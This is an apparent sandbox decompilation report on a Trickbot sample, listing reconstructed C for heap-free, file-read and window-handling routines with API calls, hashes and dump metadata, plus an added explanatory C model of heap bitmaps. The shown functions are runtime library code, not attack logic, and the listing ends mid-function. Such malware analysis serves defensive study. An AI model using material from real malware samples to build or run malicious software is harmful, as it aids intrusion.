                          				_t165 =  *_t3;
                          				_t4 = _t195 + 0xc; // 0x6ac35b
                          				_t5 = _t255 - 4; // 0x21b1
                          				_t256 = _t255 + 0xfffffffc;
                          				_t291 = _t255 -  *_t4 >> 0xf;
                          				_t6 = _t256 - 4; // 0x6a006a
                          				_t187 =  *_t5 - 1;
                          				_v8 =  *_t6;
                          				_v16 = _t187;
                          				_v20 = _t291 * 0x204 + _t165 + 0x144;
                          				_t199 =  *(_t256 + _t187);
                          				_v12 = _t199;
                          				if((_t199 & 0x00000001) != 0) {
                          					L10:
                          					_t274 = (_t187 >> 4) - 1;
                          					if(_t274 > 0x3f) {
                          						_t274 = 0x3f;
                          					}
                          					_t201 = _v8 & 0x00000001;
                          					_v24 = _t201;
                          					if(_t201 == 0) {
                          						_v12 = _t256 - _v8;
                          						_t230 = (_v8 >> 4) - 1;
                          						_t261 = 0x3f;
                          						_a8 = _t230;
                          						if(_t230 > _t261) {
                          							_a8 = _t261;
                          							_t230 = _t261;
                          						}
                          						_t187 = _t187 + _v8;
                          						_v16 = _t187;
                          						_t274 = (_t187 >> 4) - 1;
                          						if(_t274 > _t261) {
                          							_t274 = _t261;
                          						}
                          						if(_t230 != _t274) {
                          							_t231 = _v12;
                          							_t66 = _t231 + 4; // 0x75ff8504
                          							_t67 = _t231 + 8; // 0x5d5e5f05
                          							if( *_t66 ==  *_t67) {
                          								_t236 = _a8;
                          								if(_t236 >= 0x20) {
                          									_t80 = _t165 + 4; // 0x75ff8504
                          									_t239 = _a8 + _t80;
                          									_t267 =  !(0x80000000 >> _t236 + 0xffffffe0);
                          									 *(_t165 + 0xc4 + _t291 * 4) =  *(_t165 + 0xc4 + _t291 * 4) & 0x80000000;
                          									 *_t239 =  *_t239 - 1;
                          									if( *_t239 == 0) {
                          										_a4[1] = _a4[1] & _t267;
                          									}
                          								} else {
                          									_t70 = _t165 + 4; // 0x75ff8504
                          									_t241 = _t236 + _t70;
                          									_t270 =  !(0x80000000 >> _t236);
                          									 *(_t165 + 0x44 + _t291 * 4) =  *(_t165 + 0x44 + _t291 * 4) & 0x80000000;
                          									 *_t241 =  *_t241 - 1;
                          									if( *_t241 == 0) {
                          										 *_a4 =  *_a4 & _t270;
                          									}
                          								}
                          							}
                          							_t232 = _v12;
                          							_t91 = _t232 + 8; // 0x5d5e5f05
                          							_t92 = _t232 + 4; // 0x75ff8504
                          							 *((intOrPtr*)( *_t91 + 4)) =  *_t92;
                          							_t234 = _v12;
                          							_t95 = _t234 + 4; // 0x75ff8504
                          							_t96 = _t234 + 8; // 0x5d5e5f05
                          							 *((intOrPtr*)( *_t95 + 8)) =  *_t96;
                          						}
                          						_t256 = _v12;
                          					}
                          					if(_v24 != 0 || _a8 != _t274) {
                          						_t104 = _v20 + _t274 * 8 + 4; // 0xe004247c
                          						_t256[1] =  *_t104;
                          						_t206 = _v20 + _t274 * 8;
                          						_t256[2] = _t206;
                          						 *(_t206 + 4) = _t256;
                          						_t111 =  &(_t256[1]); // 0x6a006a
                          						 *( *_t111 + 8) = _t256;
                          						_t113 =  &(_t256[1]); // 0x6a006a
                          						_t114 =  &(_t256[2]); // 0x6ad6ff
                          						if( *_t113 ==  *_t114) {
                          							_t220 =  *((intOrPtr*)(_t274 + _t165 + 4));
                          							_a11 = _t220;
                          							_t221 = _t220 + 1;
                          							 *((char*)(_t274 + _t165 + 4)) = _t221;
                          							if(_t221 >= 0) {
                          								if(_a11 == 0) {
                          									_t126 = _t274 - 0x20; // 0x218f
                          									_a4[1] = _a4[1] | 0x80000000 >> _t126;
                          								}
                          								_t130 = _t274 - 0x20; // 0x218f
                          								 *(_t165 + 0xc4 + _t291 * 4) =  *(_t165 + 0xc4 + _t291 * 4) | 0x80000000 >> _t130;
                          							} else {
                          								if(_a11 == 0) {
                          									 *_a4 =  *_a4 | 0x80000000 >> _t274;
                          								}
                          								 *(_t165 + 0x44 + _t291 * 4) =  *(_t165 + 0x44 + _t291 * 4) | 0x80000000 >> _t274;
                          							}
                          							_t187 = _v16;
                          						}
                          					}
                          					_t166 = _v20;
                          					 *_t256 = _t187;
                          					_t137 = _t256 - 4; // 0xc483f88b
                          					 *(_t187 + _t137) = _t187;
                          					 *_t166 =  *_t166 - 1;
                          					if( *_t166 != 0) {
                          						return _t166;
                          					} else {
                          						_t167 =  *0x44d0b0; // 0x0
                          						if(_t167 == 0) {
                          							L45:
                          							_t168 = _a4;
                          							L46:
                          							 *0x44d0b0 = _t168;
                          							 *0x44d0a8 = _t291;
                          							return _t168;
                          						}
                          						_t209 =  *0x44d0a8; // 0x0
                          						VirtualFree((_t209 << 0xf) +  *((intOrPtr*)(_t167 + 0xc)), 0x8000, 0x4000);
                          						_t212 =  *0x44d0a8; // 0x0
                          						_t170 =  *0x44d0b0; // 0x0
                          						 *(_t170 + 8) =  *(_t170 + 8) | 0x80000000 >> _t212;
                          						_t171 =  *0x44d0b0; // 0x0
                          						_t213 =  *0x44d0a8; // 0x0
                          						 *( *((intOrPtr*)(_t171 + 0x10)) + 0xc4 + _t213 * 4) =  *( *((intOrPtr*)(_t171 + 0x10)) + 0xc4 + _t213 * 4) & 0x00000000;
                          						_t173 =  *0x44d0b0; // 0x0
                          						 *((char*)( *((intOrPtr*)(_t173 + 0x10)) + 0x43)) =  *((char*)( *((intOrPtr*)(_t173 + 0x10)) + 0x43)) - 1;
                          						_t175 =  *0x44d0b0; // 0x0
                          						if( *((char*)( *((intOrPtr*)(_t175 + 0x10)) + 0x43)) == 0) {
                          							 *(_t175 + 4) =  *(_t175 + 4) & 0xfffffffe;
                          							_t175 =  *0x44d0b0; // 0x0
                          						}
                          						if( *((intOrPtr*)(_t175 + 8)) != 0xffffffff) {
                          							goto L45;
                          						} else {
                          							VirtualFree( *(_t175 + 0xc), 0, 0x8000);
                          							_t177 =  *0x44d0b0; // 0x0
                          							HeapFree( *0x44d0bc, 0,  *(_t177 + 0x10));
                          							_t179 =  *0x44d0b4; // 0x1
                          							_t259 =  *0x44d0b8; // 0x13507d0
                          							_t182 =  *0x44d0b0; // 0x0
                          							_t162 = _t182 + 0x14; // 0x14
                          							E00405BD0(_t182, _t162, (_t179 + _t179 * 4 << 2) - _t182 + _t259 - 0x14);
                          							_t168 = _a4;
                          							 *0x44d0b4 =  *0x44d0b4 - 1;
                          							_t320 = _t168 -  *0x44d0b0; // 0x0
                          							if(_t320 > 0) {
                          								_t168 = _t168 - 0x14;
                          							}
                          							_t219 =  *0x44d0b8; // 0x13507d0
                          							 *0x44d0ac = _t219;
                          							goto L46;
                          						}
                          					}
                          				} else {
                          					_t244 = (_t199 >> 4) - 1;
                          					_t280 = 0x3f;
                          					_a8 = _t244;
                          					if(_t244 > _t280) {
                          						_a8 = _t280;
                          					}
                          					if( *((intOrPtr*)( &(_t256[1]) + _t187)) ==  *((intOrPtr*)( &(_t256[2]) + _t187))) {
                          						_t248 = _a8;
                          						if(_t248 >= 0x20) {
                          							_t34 = _t165 + 4; // 0x75ff8504
                          							_t251 = _a8 + _t34;
                          							_t285 =  !(0x80000000 >> _t248 + 0xffffffe0);
                          							 *(_t165 + 0xc4 + _t291 * 4) =  *(_t165 + 0xc4 + _t291 * 4) & 0x80000000;
                          							 *_t251 =  *_t251 - 1;
                          							if( *_t251 == 0) {
                          								_a4[1] = _a4[1] & _t285;
                          							}
                          						} else {
                          							_t24 = _t165 + 4; // 0x75ff8504
                          							_t253 = _t248 + _t24;
                          							_t288 =  !(0x80000000 >> _t248);
                          							 *(_t165 + 0x44 + _t291 * 4) =  *(_t165 + 0x44 + _t291 * 4) & 0x80000000;
                          							 *_t253 =  *_t253 - 1;
                          							if( *_t253 == 0) {
                          								 *_a4 =  *_a4 & _t288;
                          							}
                          						}
                          					}
                          					 *((intOrPtr*)( *((intOrPtr*)( &(_t256[2]) + _t187)) + 4)) =  *((intOrPtr*)( &(_t256[1]) + _t187));
                          					_t247 =  *((intOrPtr*)( &(_t256[1]) + _t187));
                          					_t282 =  *((intOrPtr*)( &(_t256[2]) + _t187));
                          					_t187 = _t187 + _v12;
                          					 *((intOrPtr*)(_t247 + 8)) = _t282;
                          					_v16 = _t187;
                          					goto L10;
                          				}
                          			}
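Triage note and added example (editor's code, not from the report or the sample). The constants in E00408204 match the small-block heap free routine that the Microsoft Visual C runtime links statically into x86 binaries: bucket index (size >> 4) - 1 capped at 0x3f, 0x204-byte group records, 0x8000-byte groups selected by >> 0xf, bitmaps addressed as 0x80000000 >> index and split across two dwords at index 0x20, a deferred header/group pair kept in globals (0x44d0b0 / 0x44d0a8), VirtualFree with MEM_DECOMMIT (0x4000) and MEM_RELEASE (0x8000), and 0x14-byte header records compacted through a memmove-like helper (E00405BD0). Treat it as runtime code rather than Trickbot logic. The model below re-derives the free-list bookkeeping the listing manipulates; the structure and function names (sbh_region, sbh_mark_free, ...) are mine and the layout assumptions are stated in the comments.

```c
/*
 * Added example (editor's code, not from the sample or the report): a model of
 * the bitmap bookkeeping that E00408204 updates when a block is freed.
 * Layout assumed from the listing:
 *   bucket index  = (block size >> 4) - 1, capped at 0x3f (64 buckets)
 *   bucket bit    = 0x80000000 >> (index & 31)
 *   index <  0x20 -> first dword  (listing: *_a4,   and region+0x44 + group*4)
 *   index >= 0x20 -> second dword (listing: _a4[1], and region+0xc4 + group*4)
 *   byte counter per bucket at region+4+index; the header bit is cleared when it reaches 0.
 */
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

#define SBH_BUCKETS   64u
#define SBH_MAX_GROUP 32u   /* groups (0x8000-byte pages) tracked per region in the listing */

typedef struct {
    uint32_t entry_hi, entry_lo;        /* header bitmap: buckets 0..31 / 32..63 with any free entry */
    uint8_t  cnt[SBH_BUCKETS];          /* per-bucket count of groups that hold a free entry        */
    uint32_t group_hi[SBH_MAX_GROUP];   /* per-group bitmap, buckets 0..31                            */
    uint32_t group_lo[SBH_MAX_GROUP];   /* per-group bitmap, buckets 32..63                           */
} sbh_region;

static uint32_t bucket_bit(unsigned idx) { return 0x80000000u >> (idx & 31u); }

/* Bucket for a block size (multiples of 16, at least 16), capped at 0x3f as the listing does. */
unsigned sbh_bucket_index(uint32_t size) {
    unsigned idx = (unsigned)(size >> 4) - 1u;
    return idx > 0x3fu ? 0x3fu : idx;
}

/* A block of bucket idx in group g joins the free list: set the group bit; the header bit is
   set only when this bucket was empty in every group (counter went from 0 to 1). */
void sbh_mark_free(sbh_region *r, unsigned g, unsigned idx) {
    uint32_t *gmap = idx < 32u ? &r->group_hi[g] : &r->group_lo[g];
    uint32_t *hmap = idx < 32u ? &r->entry_hi    : &r->entry_lo;
    *gmap |= bucket_bit(idx);
    if (r->cnt[idx]++ == 0) *hmap |= bucket_bit(idx);
}

/* The last free block of bucket idx in group g is consumed: clear the group bit and, mirroring
   the decrement-to-zero test in the listing, drop the header bit when no group has one left. */
void sbh_mark_used(sbh_region *r, unsigned g, unsigned idx) {
    uint32_t *gmap = idx < 32u ? &r->group_hi[g] : &r->group_lo[g];
    uint32_t *hmap = idx < 32u ? &r->entry_hi    : &r->entry_lo;
    *gmap &= ~bucket_bit(idx);
    if (r->cnt[idx] != 0 && --r->cnt[idx] == 0) *hmap &= ~bucket_bit(idx);
}

bool sbh_header_has_free(const sbh_region *r, unsigned idx) {
    return ((idx < 32u ? r->entry_hi : r->entry_lo) & bucket_bit(idx)) != 0;
}

/* Allocation-side view of the same bitmaps: lowest bucket >= idx with a free entry, or -1. */
int sbh_first_free_bucket(const sbh_region *r, unsigned idx) {
    for (unsigned i = idx; i < SBH_BUCKETS; i++)
        if (sbh_header_has_free(r, i)) return (int)i;
    return -1;
}

/* Walks one free/use cycle across the dword boundary; returns 1 when every invariant holds. */
int sbh_selftest(void) {
    sbh_region r;
    memset(&r, 0, sizeof r);
    sbh_mark_free(&r, 3, 40);                 /* bucket 40 -> second dword, bit 8 */
    if (r.group_lo[3] != (0x80000000u >> 8) || r.entry_lo != (0x80000000u >> 8) || r.entry_hi != 0) return 0;
    sbh_mark_free(&r, 5, 40);
    if (r.cnt[40] != 2) return 0;
    sbh_mark_used(&r, 3, 40);                 /* group 5 still has one: header bit stays */
    if (!sbh_header_has_free(&r, 40) || r.group_lo[3] != 0) return 0;
    sbh_mark_used(&r, 5, 40);                 /* counter hits zero: header bit cleared */
    if (sbh_header_has_free(&r, 40) || r.entry_lo != 0) return 0;
    sbh_mark_free(&r, 0, 2);                  /* bucket 2 -> first dword */
    if (r.entry_hi != (0x80000000u >> 2)) return 0;
    if (sbh_first_free_bucket(&r, 0) != 2 || sbh_first_free_bucket(&r, 3) != -1) return 0;
    return 1;
}

int main(void) {
    printf("bucket(0x40)=%u bucket(0x1000)=%u selftest=%d\n",
           sbh_bucket_index(0x40), sbh_bucket_index(0x1000), sbh_selftest());
    return 0;
}
```

The two-dword split is why the listing branches on _a8 >= 0x20 and uses _t236 + 0xffffffe0 for the shift in the high branch: the shift count is the bucket index modulo 32, and the dword is chosen by the index's top bit.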

                          Instruction addresses (one per C line above, in listing order; 0x00000000 where no instruction maps):
                          0x0040820a 0x0040820d 0x00408212 0x00408212 0x00408217 0x0040821a 0x0040821d 0x00408221 0x00408226 0x0040822f
                          0x00408230 0x0040823a 0x0040823d 0x00408240 0x00408246 0x00408249 0x004082ca 0x004082cf 0x004082d3 0x004082d7
                          0x004082d7 0x004082db 0x004082de 0x004082e1 0x004082f2 0x004082f5 0x004082f6 0x004082f9 0x004082fc 0x004082fe
                          0x00408301 0x00408301 0x00408303 0x00408308 0x0040830e 0x00408311 0x00408313 0x00408313 0x00408317 0x00408319
                          0x0040831c 0x0040831f 0x00408322 0x00408324 0x0040832a 0x00408355 0x00408355 0x00408359 0x0040835b 0x00408362
                          0x00408364 0x00408369 0x00408369 0x0040832c 0x00408333 0x00408333 0x00408337 0x00408339 0x0040833d 0x0040833f
                          0x00408344 0x00408344 0x0040833f 0x0040832a 0x0040836c 0x0040836f 0x00408372 0x00408375 0x00408378 0x0040837b
                          0x0040837e 0x00408381 0x00408381 0x00408384 0x00408384 0x0040838b 0x0040839c 0x0040839f 0x004083a5 0x004083a8
                          0x004083ab 0x004083ae 0x004083b1 0x004083b4 0x004083b7 0x004083ba 0x004083bc 0x004083c3 0x004083c6 0x004083c8
                          0x004083cc 0x004083f7 0x004083f9 0x00408406 0x00408406 0x00408409 0x0040841a 0x004083ce 0x004083d2 0x004083e0
                          0x004083e0 0x004083ef 0x004083ef 0x0040841c 0x0040841c 0x004083ba 0x0040841f 0x00408422 0x00408424 0x00408424
                          0x00408428 0x0040842a 0x0040852e 0x00408430 0x00408430 0x00408437 0x0040851c 0x0040851c 0x0040851f 0x0040851f
                          0x00408524 0x00000000 0x00408524 0x0040843d 0x0040845b 0x0040845d 0x00408463 0x0040846f 0x00408472 0x00408477
                          0x00408480 0x00408488 0x00408490 0x00408493 0x0040849f 0x004084a1 0x004084a5 0x004084a5 0x004084ae 0x00000000
                          0x004084b0 0x004084b6 0x004084b8 0x004084c8 0x004084ce 0x004084d3 0x004084e1 0x004084ed 0x004084f2 0x004084f7
                          0x004084fd 0x00408503 0x00408509 0x0040850b 0x0040850b 0x0040850e 0x00408514 0x00000000 0x00408514 0x004084ae
                          0x0040824b 0x00408250 0x00408251 0x00408252 0x00408257 0x00408259 0x00408259 0x00408264 0x00408266 0x0040826c
                          0x00408297 0x00408297 0x0040829b 0x0040829d 0x004082a4 0x004082a6 0x004082ab 0x004082ab 0x0040826e 0x00408275
                          0x00408275 0x00408279 0x0040827b 0x0040827f 0x00408281 0x00408286 0x00408286 0x00408281 0x0040826c 0x004082b6
                          0x004082b9 0x004082bd 0x004082c1 0x004082c4 0x004082c7 0x00000000 0x004082c7

                          APIs
                          • VirtualFree.KERNEL32(?,00008000,00004000,00000000,j/@,00000000), ref: 0040845B
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004084B6
                          • HeapFree.KERNEL32(00000000,?), ref: 004084C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Free$Virtual$Heap
                          • String ID: j/@
                          • API String ID: 2016334554-13740958
                          • Opcode ID: 9398784c202d3c12fe2028f5fe0b8331a764e9df01002e798e1e32a16c2a6827
                          • Instruction ID: 042dcbe8a8a06e0e521ddce9e0779ee64613f054c7a1be9f6aaeea80637108d5
                          • Opcode Fuzzy Hash: 9398784c202d3c12fe2028f5fe0b8331a764e9df01002e798e1e32a16c2a6827
                          • Instruction Fuzzy Hash: E3B15435A00205DFDB14CF44C990A69BBA2FF95328F25C2AED84A5B392DB35ED46CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00414DD2(signed int _a4, signed int _a8, long _a12) {
                          				void _v5;
                          				signed int _v12;
                          				long _v16;
                          				signed int _t75;
                          				void* _t78;
                          				intOrPtr _t82;
                          				signed char _t83;
                          				signed char _t85;
                          				long _t86;
                          				void* _t88;
                          				signed char _t90;
                          				signed char _t91;
                          				signed int _t95;
                          				intOrPtr _t96;
                          				char _t98;
                          				signed int _t99;
                          				long _t101;
                          				long _t102;
                          				signed int _t103;
                          				intOrPtr _t106;
                          				signed int _t108;
                          				signed int _t109;
                          				signed int _t111;
                          				signed char _t112;
                          				signed char* _t113;
                          				long _t115;
                          				void* _t119;
                          				signed int _t120;
                          				intOrPtr* _t121;
                          				signed int _t123;
                          				signed char* _t124;
                          				void* _t125;
                          				void* _t126;
                          
                          				_v12 = _v12 & 0x00000000;
                          				_t108 = _a8;
                          				_t119 = _t108;
                          				if(_a12 == 0) {
                          					L42:
                          					__eflags = 0;
                          					return 0;
                          				}
                          				_t75 = _a4;
                          				_t111 = _t75 >> 5;
                          				_t121 = 0x44cfa0 + _t111 * 4;
                          				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
                          				_t78 =  *((intOrPtr*)(0x44cfa0 + _t111 * 4)) + _t123;
                          				_t112 =  *((intOrPtr*)(_t78 + 4));
                          				if((_t112 & 0x00000002) != 0) {
                          					goto L42;
                          				}
                          				if((_t112 & 0x00000048) != 0) {
                          					_t106 =  *((intOrPtr*)(_t78 + 5));
                          					if(_t106 != 0xa) {
                          						_a12 = _a12 - 1;
                          						 *_t108 = _t106;
                          						_t119 = _t108 + 1;
                          						_v12 = 1;
                          						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
                          					}
                          				}
                          				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
                          					_t82 =  *_t121;
                          					_t120 = _v16;
                          					_v12 = _v12 + _t120;
                          					_t31 = _t123 + 4; // 0x4
                          					_t113 = _t82 + _t31;
                          					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
                          					__eflags = _t83 & 0x00000080;
                          					if((_t83 & 0x00000080) == 0) {
                          						L41:
                          						return _v12;
                          					}
                          					__eflags = _t120;
                          					if(_t120 == 0) {
                          						L15:
                          						_t85 = _t83 & 0x000000fb;
                          						__eflags = _t85;
                          						L16:
                          						 *_t113 = _t85;
                          						_t86 = _a8;
                          						_a12 = _t86;
                          						_t115 = _v12 + _t86;
                          						__eflags = _t86 - _t115;
                          						_v12 = _t115;
                          						if(_t86 >= _t115) {
                          							L40:
                          							_t109 = _t108 - _a8;
                          							__eflags = _t109;
                          							_v12 = _t109;
                          							goto L41;
                          						} else {
                          							goto L17;
                          						}
                          						while(1) {
                          							L17:
                          							_t88 =  *_a12;
                          							__eflags = _t88 - 0x1a;
                          							if(_t88 == 0x1a) {
                          								break;
                          							}
                          							__eflags = _t88 - 0xd;
                          							if(_t88 == 0xd) {
                          								__eflags = _a12 - _t115 - 1;
                          								if(_a12 >= _t115 - 1) {
                          									_a12 = _a12 + 1;
                          									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
                          									__eflags = _t95;
                          									if(_t95 != 0) {
                          										L26:
                          										__eflags = _v16;
                          										if(_v16 == 0) {
                          											L34:
                          											 *_t108 = 0xd;
                          											L35:
                          											_t108 = _t108 + 1;
                          											__eflags = _t108;
                          											L36:
                          											_t115 = _v12;
                          											__eflags = _a12 - _t115;
                          											if(_a12 < _t115) {
                          												continue;
                          											}
                          											goto L40;
                          										}
                          										_t96 =  *_t121;
                          										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
                          										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
                          											__eflags = _t108 - _a8;
                          											if(__eflags != 0) {
                          												L33:
                          												E0040BA83(__eflags, _a4, 0xffffffff, 1);
                          												_t126 = _t126 + 0xc;
                          												__eflags = _v5 - 0xa;
                          												if(_v5 == 0xa) {
                          													goto L36;
                          												}
                          												goto L34;
                          											}
                          											__eflags = _v5 - 0xa;
                          											if(__eflags != 0) {
                          												goto L33;
                          											}
                          											L32:
                          											 *_t108 = 0xa;
                          											goto L35;
                          										}
                          										_t98 = _v5;
                          										__eflags = _t98 - 0xa;
                          										if(_t98 == 0xa) {
                          											goto L32;
                          										}
                          										 *_t108 = 0xd;
                          										_t108 = _t108 + 1;
                          										 *((char*)( *_t121 + _t123 + 5)) = _t98;
                          										goto L36;
                          									}
                          									_t99 = GetLastError();
                          									__eflags = _t99;
                          									if(_t99 != 0) {
                          										goto L34;
                          									}
                          									goto L26;
                          								}
                          								_t101 = _a12 + 1;
                          								__eflags =  *_t101 - 0xa;
                          								if( *_t101 != 0xa) {
                          									 *_t108 = 0xd;
                          									_t108 = _t108 + 1;
                          									_a12 = _t101;
                          									goto L36;
                          								}
                          								_a12 = _a12 + 2;
                          								goto L32;
                          							}
                          							 *_t108 = _t88;
                          							_t108 = _t108 + 1;
                          							_a12 = _a12 + 1;
                          							goto L36;
                          						}
                          						_t124 =  *_t121 + _t123 + 4;
                          						_t90 =  *_t124;
                          						__eflags = _t90 & 0x00000040;
                          						if((_t90 & 0x00000040) == 0) {
                          							_t91 = _t90 | 0x00000002;
                          							__eflags = _t91;
                          							 *_t124 = _t91;
                          						}
                          						goto L40;
                          					}
                          					__eflags =  *_t108 - 0xa;
                          					if( *_t108 != 0xa) {
                          						goto L15;
                          					}
                          					_t85 = _t83 | 0x00000004;
                          					goto L16;
                          				}
                          				_t102 = GetLastError();
                          				_t125 = 5;
                          				if(_t102 != _t125) {
                          					__eflags = _t102 - 0x6d;
                          					if(_t102 == 0x6d) {
                          						goto L42;
                          					}
                          					_t103 = E004067ED(_t102);
                          					L10:
                          					return _t103 | 0xffffffff;
                          				}
                          				 *((intOrPtr*)(E00406860())) = 9;
                          				_t103 = E00406869();
                          				 *_t103 = _t125;
                          				goto L10;
                          			}

                          APIs
                          • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00414E4C
                          • GetLastError.KERNEL32(?,?), ref: 00414E56
                          • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 00414F1C
                          • GetLastError.KERNEL32(?,?), ref: 00414F26
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ErrorFileLastRead
                          • String ID:
                          • API String ID: 1948546556-0
                          • Opcode ID: 6a04b9401edfdf0255cc1e1e77202a38224b77e703b3c2fe6b795ef2b0e4e6dd
                          • Instruction ID: d9f3edf35bd78f5494cf6d694dabbaf9feb375bf1f1fd386cc1f865da9e8df43
                          • Opcode Fuzzy Hash: 6a04b9401edfdf0255cc1e1e77202a38224b77e703b3c2fe6b795ef2b0e4e6dd
                          • Instruction Fuzzy Hash: C951B634604389DFDF218F98C884BDA7BB0BF86309F14449BE8659B391D3789987CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E004252CC() {
                          				void* __ecx;
                          				void* __ebp;
                          				void* _t46;
                          				intOrPtr _t49;
                          				void* _t91;
                          				struct tagRECT* _t92;
                          				intOrPtr* _t94;
                          				signed int _t107;
                          				intOrPtr _t112;
                          				void* _t116;
                          				intOrPtr* _t117;
                          				intOrPtr* _t118;
                          				signed int _t121;
                          				signed int _t122;
                          				intOrPtr* _t123;
                          				intOrPtr _t124;
                          				void* _t129;
                          
                          				_t124 =  *((intOrPtr*)(_t129 + 0xc));
                          				_t123 = _t94;
                          				if(_t124 != 0) {
                          					_t117 = _t123 + 0x90;
                          					 *((intOrPtr*)( *_t123 + 0x100))(_t117, _t116, _t91);
                          					if(_t124 < 0x12d || _t124 > 0x20d) {
                          						_t49 =  *_t123;
                          						_t92 = _t123 + 0xa0;
                          						_push(_t92);
                          						if(_t124 != 3) {
                          							 *((intOrPtr*)(_t49 + 0x104))(_t124);
                          							goto L8;
                          						}
                          						 *((intOrPtr*)(_t49 + 0x104))(1);
                          						_t112 =  *_t123;
                          						 *((intOrPtr*)(_t129 + 0x10)) =  *((intOrPtr*)(_t123 + 0x8c));
                          						 *((intOrPtr*)(_t123 + 0x84)) = 1;
                          						 *((intOrPtr*)(_t112 + 0x104))(2, _t123 + 0xb0);
                          						 *((intOrPtr*)(_t123 + 0x8c)) =  *((intOrPtr*)(_t129 + 0x10));
                          						asm("cdq");
                          						OffsetRect(_t92, 0,  *((intOrPtr*)(_t117 + 0xc)) -  *((intOrPtr*)(_t117 + 4)) - _t112 >> 1);
                          						asm("cdq");
                          						OffsetRect(_t123 + 0xb0,  *((intOrPtr*)(_t117 + 8)) -  *_t117 - _t112 >> 1, 0);
                          						goto L4;
                          					} else {
                          						_t92 = _t123 + 0xa0;
                          						_t121 = _t124 - 0x12d;
                          						asm("cdq");
                          						_t107 = 0xf;
                          						 *((intOrPtr*)( *_t123 + 0x104))(_t121 / _t107 + 0x65, _t92);
                          						asm("cdq");
                          						_t122 = 0xf;
                          						 *((intOrPtr*)(_t123 + 0x84)) = 1;
                          						 *((intOrPtr*)( *_t123 + 0x104))(_t121 % _t122 + 0xc9, _t123 + 0xb0);
                          						L4:
                          						_t124 =  *((intOrPtr*)(_t129 + 0x18));
                          						L8:
                          						_t118 =  *((intOrPtr*)( *_t123 + 0xe0))(0, 0);
                          						if(_t118 != 0 && E0041C5C7(_t118, 0x43be88) != 0) {
                          							 *((intOrPtr*)( *_t118 + 0xe8))(0, E00419D7A(_t123));
                          						}
                          						E0041884D(_t124, SetCapture( *(_t123 + 0x1c)));
                          						E0041B83C(_t123);
                          						RedrawWindow( *(_t123 + 0x1c), 0, 0, 0x180);
                          						 *((intOrPtr*)(_t123 + 0x80)) = 1;
                          						 *((intOrPtr*)( *_t123 + 0xc4))(_t92);
                          						if( *((intOrPtr*)(_t123 + 0x84)) != 0) {
                          							 *((intOrPtr*)( *_t123 + 0xc4))(_t123 + 0xb0);
                          						}
                          						 *((intOrPtr*)(_t123 + 0xc0)) = _t124;
                          						return  *((intOrPtr*)( *_t123 + 0x114))(_t124);
                          					}
                          				}
                          				return _t46;
                          			}

                          APIs
                          • OffsetRect.USER32(?,00000000,?), ref: 004253C3
                          • OffsetRect.USER32(?,?,00000000), ref: 004253D9
                          • SetCapture.USER32(?), ref: 00425424
                          • RedrawWindow.USER32(?,00000000,00000000,00000180), ref: 00425443
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: OffsetRect$CaptureRedrawWindow
                          • String ID:
                          • API String ID: 1977905163-0
                          • Opcode ID: d7b0343ac6f92285979404101ce89f9e4ad66bd3ceee71ae46167eac0636048b
                          • Instruction ID: 76443f4b5d8bdb97f7461ede94f69d2c64a5c100c535cf431055f2cae8812015
                          • Opcode Fuzzy Hash: d7b0343ac6f92285979404101ce89f9e4ad66bd3ceee71ae46167eac0636048b
                          • Instruction Fuzzy Hash: 835181713007059FD7209F69D848FABB7E9FF88700F44452EF99AC7281DBB4A8448B54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E0042A36A(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				struct tagRECT _v28;
                          				struct tagRECT _v44;
                          				struct tagRECT _v60;
                          				void* _t79;
                          				int _t81;
                          				intOrPtr* _t83;
                          				intOrPtr _t87;
                          				intOrPtr _t106;
                          				int _t120;
                          				void* _t128;
                          				void* _t132;
                          				intOrPtr _t138;
                          				void* _t140;
                          				void* _t143;
                          
